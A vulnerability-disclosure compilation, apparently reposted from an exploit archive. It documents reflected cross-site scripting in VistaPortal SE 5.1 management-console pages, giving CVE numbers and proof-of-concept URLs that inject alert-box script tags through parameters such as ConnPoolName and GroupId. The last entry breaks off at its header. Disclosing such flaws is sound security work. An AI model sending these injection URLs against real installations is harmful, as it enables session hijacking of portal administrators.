VistaPortal SE 5.1 Cross Site Scripting

#217
Topic created · 1 Posts · 1 Views
  • VistaPortal SE version 5.1 build 51029 suffers from multiple cross site scripting vulnerabilities.
    MD5 | 6edb126f7aa16dacfe59cfa661c90adb
    Download

    Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,  
    CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,  
    CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,  
    CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,  
    CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,  
    CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,  
    CVE-2018-19820, CVE-2018-19821, CVE-2018-19822  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19649  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19765  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,  
    GroupId and ParentId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0  
    Vulnerable parameter: ConnPoolName, GroupId and ParentId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19766  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName  
    parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security  
    Resources&loginPath=_VP_Configuration,_VP_Security_Resources  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19767  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId  
    parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page  
    Packages,InfoVista  
    Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package  
    http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page  
    Packages,InfoVista  
    Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package  
    Vulnerable parameters: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19768  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and  
    GroupId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page  
    Packages&loginPath=PagePackageMainFolder  
    http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page  
    Packages&loginPath=PagePackageMainFolder  
    Vulnerable parameters: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19769  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "UserProperties.jsp" has reflected XSS via ConnPoolName.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User  
    Properties&loginPath=_VP_Configuration,_VP_User_Propertie  
    Vulnerable parameters: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19770  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "Users.jsp" has reflected XSS via ConnPoolName.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista  
    Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups  
    Vulnerable parameters: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19771  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r)  
    Database  
    Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection  
    Vulnerable parameter: PropName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19772  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,  
    GroupId and ParentId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0  
    Vulnerable parameter: ConnPoolName, GroupId and ParentId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19773  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "EditCurrentUser.jsp" has reflected XSS via GroupId and  
    ConnPoolName parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super  
    Administrator&loginPath=All,_superadmin_shadow_  
    http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super  
    Administrator&loginPath=All,_superadmin_shadow_  
    Vulnerable parameter: GroupId and ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19774  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName  
    parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U  
    http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U  
    Vulnerable parameter: GroupId and ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19775  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId  
    parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo  
    http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo  
    Vulnerable parameter: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19809  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via  
    ConnPoolName, GroupId and type parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>  
    http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159  
    '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default  
    http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P  
    '"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default  
    Vulnerable parameter: ConnPoolName, GroupId and type  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19810  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via  
    ConnPoolName, GroupId and type parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>  
    http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P  
    '"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default  
    Vulnerable parameter: ConnPoolName and type  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19811  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via  
    ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19812  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via  
    GroupId parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5  
    '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F  
    Vulnerable parameter: GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19813  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via  
    ConnPoolName and GroupId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=P  
    http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159  
    '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P  
    Vulnerable parameter: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19814  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via  
    ConnPoolName and GroupId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P  
    '"><ScRiPt>alert("xss")</ScRiPt>  
    http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=P  
    http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159  
    '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P  
    Vulnerable parameter: ConnPoolName, GroupId and type  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19815  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS  
    via ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19816  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has  
    reflected XSS via ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19817  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected  
    XSS via ConnPoolName and GroupId parameters.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4  
    '"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U  
    Vulnerable parameter: ConnPoolName and GroupId  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19818  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via  
    ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19819  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via  
    ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19820  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName  
    parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
    # Version: VistaPortal SE Version 5.1 (build 51029)  
    # Tested on: all  
    # CVE : CVE-2018-19821  
    # Category: webapps  
    1. Description  
    Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).  
    The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via  
    ConnPoolName parameter.  
    2. Proof of Concept  
    http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=  
    '"><ScRiPt>alert("xss")</ScRiPt>&type=U  
    Vulnerable parameter: ConnPoolName  
    3. Solution:  
    Solutions in next versions this product.  
    Patch:  
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules  
    -->  
    <!--  
    # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build  
    51029)  
    # Date: 28-11-2018  
    # Exploit Author: Rafael Pedrero  
    # Vendor Homepage: http://www.infovista.com  
    # Software Link: http://www.infovista.com  
